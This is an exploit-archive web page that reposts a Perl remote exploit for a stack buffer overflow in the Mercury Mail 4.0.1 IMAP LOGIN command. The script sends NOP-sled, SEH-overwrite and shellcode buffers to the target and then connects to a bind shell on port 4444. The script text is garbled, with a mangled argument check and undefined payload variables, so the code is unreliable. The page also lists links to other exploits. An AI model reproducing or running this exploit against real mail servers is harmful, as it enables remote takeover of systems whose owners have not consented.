Mercury Mail 4.0.1 (LOGIN) Remote IMAP Stack Buffer Overflow Exploit

所属分类：网络安全 / Exploit 阅读数： 120

收藏 0赞 0分享

#!/usr/bin/perl
#
# http://www.securityfocus.com/bid/11775
# credit to Muts for this vulnerability
# acaro [at] jervus.it
use IO::Socket::INET;
use Switch;
if (@ARGV new(proto=>'tcp', PeerAddr=>$host, PeerPort=>$port);
$socket or die "Cannot connect to host!\n";
recv($socket, $reply, 1024, 0);
print "Response:" . $reply;
send $socket, $request, 0;
print "[ ] Sent 1st request\n";
recv($socket, $reply, 1024, 0);
print "Response:" . $reply;
sleep(1);
my $request ="\x41" x 255;
send $socket, $request, 0;
print "[ ] Sent 2nd request\n";
sleep(1);
my $request=("\x45" x7420).("\x90" x10).$happy.("\x90" x14).$shellcode.("\x41" x8).$nextseh.$seh.("\x90" x5).$jmp.("\x90" x533);
send $socket, $request, 0;
print "[ ] Sent final request\n";
sleep(1);
close($socket);
print " connect on port 4444 of $host ...\n";
sleep(3);
system("telnet $host 4444");
exit;
//http://www.leftworld.net

更多精彩内容其他人还在看

Mercury Mail 4.0.1 (LOGIN) Remote IMAP Stack Buffer Overflow Exploit

Maian Events 2.0 Insecure Cookie Handling Vulnerability

Maian Gallery 2.0 Insecure Cookie Handling Vulnerability

Million Pixels 3 (id_cat) Remote SQL Injection Vulnerability

Maian Cart 1.1 Insecure Cookie Handling Vulnerability

Mercury Mail 4.0.1 (LOGIN) Remote IMAP Stack Buffer Overflow Exploit

phsBlog 0.2 Bypass SQL Injection Filtering Exploit

Easy Photo Gallery 2.1 XSS/FD/Bypass/SQL Injection Exploit

Maxthon Browser 2.1.4.443 UNICODE Remote Denial of Service PoC

minb 0.1.0 Remote Code Execution Exploit

Adobe Acrobat 9 ActiveX Remote Denial of Service Exploit

网络赚钱

站长故事